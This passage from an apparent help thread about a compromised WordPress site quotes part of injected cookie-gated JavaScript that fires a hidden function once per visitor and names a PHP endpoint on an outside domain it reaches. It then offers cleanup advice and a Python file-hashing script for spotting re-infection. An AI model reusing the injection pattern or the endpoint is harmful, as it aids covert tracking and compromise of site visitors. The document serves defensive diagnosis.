var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
k09();
}
}
http://dostojewskij-gesellschaft.de/VD49Jdzr.php simply outputs "OK".
Why?
My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.
The good part is that it seems that they haven't used any of your user database or anything else.
The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.
Change all passwords. Even your DB login. Consider everything compromised.
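The question's EDIT says the injected code came back in header.php after a cleanup. One way to see exactly which files change between the cleanup and a re-infection, as an added example that is not from the original posts: take a hash manifest of the cleaned tree and diff it against a later one. The tree, theme and plugin names and file contents below are constructed; `wp-content/uploads` is WordPress's standard upload directory.

```python
import hashlib
import os
import tempfile

# Extensions that a web server would typically hand to the PHP interpreter.
EXECUTABLE_EXT = (".php", ".phtml", ".php5")


def snapshot(root):
    """Map every file path (relative to root, '/'-separated) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                manifest[rel] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def diff(baseline, current):
    """Compare two manifests: what appeared, disappeared or changed content."""
    shared = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in shared if baseline[p] != current[p]),
    }


def php_in_uploads(manifest):
    """Script files under the upload directory, which should hold only media."""
    return sorted(
        p for p in manifest
        if p.startswith("wp-content/uploads/") and p.lower().endswith(EXECUTABLE_EXT)
    )


def _write(root, rel, text):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Constructed site tree: snapshot after cleanup, then simulate the code returning."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "wp-content/themes/mytheme/header.php", "<?php wp_head(); ?>\n")
        _write(root, "wp-content/plugins/contact/form.php", "<?php // form ?>\n")
        clean = snapshot(root)

        # Constructed re-infection: header.php edited and a script dropped in uploads.
        _write(root, "wp-content/themes/mytheme/header.php",
               "<?php wp_head(); ?>\n<script>/* injected */</script>\n")
        _write(root, "wp-content/uploads/2015/05/cache.php", "<?php // dropped ?>\n")
        now = snapshot(root)
        return diff(clean, now), php_in_uploads(now)


if __name__ == "__main__":
    changes, uploads = demo()
    print(changes)
    print("scripts in uploads:", uploads)
```

Keep the baseline manifest off the web server, so that whoever can rewrite header.php cannot rewrite the manifest as well.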
